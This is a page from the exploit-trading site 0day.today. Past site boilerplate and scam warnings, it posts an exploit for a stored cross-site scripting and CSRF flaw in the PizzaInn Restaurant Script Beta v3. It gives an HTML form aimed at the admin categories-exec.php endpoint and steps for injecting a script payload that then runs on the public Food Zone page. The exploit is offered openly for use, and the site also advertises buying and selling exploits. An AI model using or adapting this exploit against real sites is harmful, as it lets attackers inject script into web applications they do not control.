0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PizzaInn Beta 3 Cross Site Scripting Vulnerability
# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (categories-exec.php) - Stored XSS # Author :------------------------ : Nassim Asrir # Author Company :------------------------ : HenceForth # Author Email :------------------------ : wassline@gmail.com # Google Dork :---------------- : - # Date :-------------------------- : 20/10/2016 # Type :-------------------------- : webapps # Platform : -------------------- : PHP # Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html ############################ Stored XSS Vulnerabilty ############################ ## Exploit ## <html> <title>CSRF Exploit By Nassim Asrir</title> <CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION> <form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)"> <tr> <th>Name</th> </tr> <tr> <td><input type="text" name="name" class="textfield" /></td> <td><input type="submit" name="Submit" value="Add" /></td> </tr> </form> </table> </html> ## Proc ## - Create a .html File and Put the Code. - Navigate the File in your Localhost . - and in the Textbox inject XSS Payload ("><script>alert(1);</script>) and you redirect to http://site/script/admin/access-denied.php - and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to home site and navigate "Food Zone" . and you can see the Alert Box. # 0day.today [2024-11-15] #